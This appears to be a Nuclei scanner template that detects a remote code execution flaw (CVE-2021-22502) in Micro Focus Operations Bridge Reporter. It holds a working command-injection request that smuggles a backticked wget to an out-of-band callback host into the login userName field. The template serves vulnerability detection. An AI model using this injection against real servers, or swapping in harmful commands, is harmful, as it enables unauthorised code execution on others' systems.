id: CVE-2021-22502 info: name: Micro Focus Operations Bridge Reporter - Remote Code Execution author: pikpikcu severity: critical description: | Micro Focus Operations Bridge Reporter 10.40 is susceptible to remote code execution. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. remediation: | Apply the latest security patches or updates provided by Micro Focus to mitigate this vulnerability. reference: - https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md - https://softwaresupport.softwaregrp.com/doc/KM03775947 - https://www.zerodayinitiative.com/advisories/ZDI-21-153/ - https://nvd.nist.gov/vuln/detail/CVE-2021-22502 - https://www.zerodayinitiative.com/advisories/ZDI-21-154/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-22502 cwe-id: CWE-78 epss-score: 0.96129 epss-percentile: 0.99355 cpe: cpe:2.3:a:microfocus:operation_bridge_reporter:10.40:*:*:*:*:*:*:* metadata: max-request: 1 vendor: microfocus product: operation_bridge_reporter tags: cve,cve2021,microfocus,obr,rce,kev http: - raw: - | POST /AdminService/urest/v1/LogonResource HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"userName":"something `wget {{interactsh-url}}`","credential":"whatever"} matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - "dns" - type: word part: body words: - "An error occurred" - "AUTHENTICATION_FAILED" condition: and - type: word part: header words: - "application/json" - type: status status: - 401 # digest: 4a0a00473045022100af6bffbcef0c026b11b4c567e27b3f86f6bdb39f77eb666576a0076358d7e68c02203f10423795f0ec25db707b224ccfcdf07896b88ae8e4bed0b3ccfd1eefadcfe3:922c64590222798bb761d5b6d8e72950